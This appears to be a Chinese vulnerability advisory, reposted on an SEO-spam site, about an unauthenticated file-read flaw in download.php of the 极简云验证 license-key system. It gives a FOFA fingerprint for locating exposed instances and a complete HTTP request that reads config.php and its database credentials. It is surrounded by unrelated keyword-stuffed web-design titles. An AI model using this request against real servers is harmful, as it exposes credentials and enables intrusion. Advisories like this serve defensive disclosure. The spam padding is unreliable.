当前位置: 首页 > news >正文

智能城市 电子商务网站建设门户网站有哪些

智能城市 电子商务网站建设,门户网站有哪些,加强网络平台建设,武进做网站0x01 产品简介 极简云验证是一款开源的网络验证系统,支持多应用卡密生成:卡密生成 单码卡密 次数卡密 会员卡密 积分卡密、卡密管理 卡密长度 卡密封禁 批量生成 批量导出 自定义卡密前缀等;支持多应用多用户管理:应用备注 应用版…

0x01 产品简介

极简云验证是一款开源的网络验证系统,支持多应用卡密生成:卡密生成 单码卡密 次数卡密 会员卡密 积分卡密、卡密管理 卡密长度 卡密封禁 批量生成 批量导出 自定义卡密前缀等;支持多应用多用户管理:应用备注 应用版本 多级代理价格 免费付费切换 验证用户IP 验证用户设备 应用开关等

0x02 漏洞概述

极简云验证 download.php 接口处存在文件读取漏洞,未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件,数据库账号密码等敏感信息,使系统处于极不安全的状态。

0x03 复现环境

FOFA: "../assets/img/bg/logo_white.png"

0x04 漏洞复现

PoC

GET /download.php?file=20b6cb088a8d5c444074&filename=config.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

http://www.yayakq.cn/news/82447/

相关文章:

  • 域名备案的价格邯郸网站优化建设
  • 温州免费建站模板wordpress科技主题
  • 怎么修改网站源文件网站 php 源码
  • 阳网站建设北京做网站优化的科技公司
  • 网站开发合作意向书做门户网站用什么技术好
  • 企业做外贸网站常用术语百度推广工具有哪些
  • 网页网站怎么做的html网页框架
  • 网站建设网站需要什么软件国外建站数据
  • 珠宝首饰商城网站建设百度如何把网站做链接
  • 在深圳市住房和建设局网站什么是网站建设流程
  • 大连高端网站建设ci设计
  • 做移动网站排名软件单页网站模板做seo
  • 网页在线制作网站源码营销网站优化推广
  • 建设网站要服务器网站建设公司不能备案吗
  • 南通住房和城乡建设厅网站虚拟主机与网站建设
  • 营销营网站建设qq浏览器网页版
  • 二级网站建设 管理思路空中花园做网站的公司
  • 网页网站模板深圳网站建设 宝华大厦
  • 网站建设与开发 期末作品长沙小学网站建设
  • 网站 信息内容建设 存在问题wordpress主题the 7
  • 农安建设局网站动画设计专业属于什么专业大类
  • 长沙网站asp.net网站制作视频教程
  • 营销网站建设文章沈阳建网站平台
  • 免费域名网站搭建网站推广思路
  • iis网站目录权限网站收录不增加
  • 想建个购物网站制作需要多少钱
  • 成都哪家公司做网站好商城网站建设怎么样
  • 网站建设竞争对手分析江西事件最新消息新闻
  • 开商城网站工作服定做厂家
  • ps做旅游网站在wordpress上添加播放器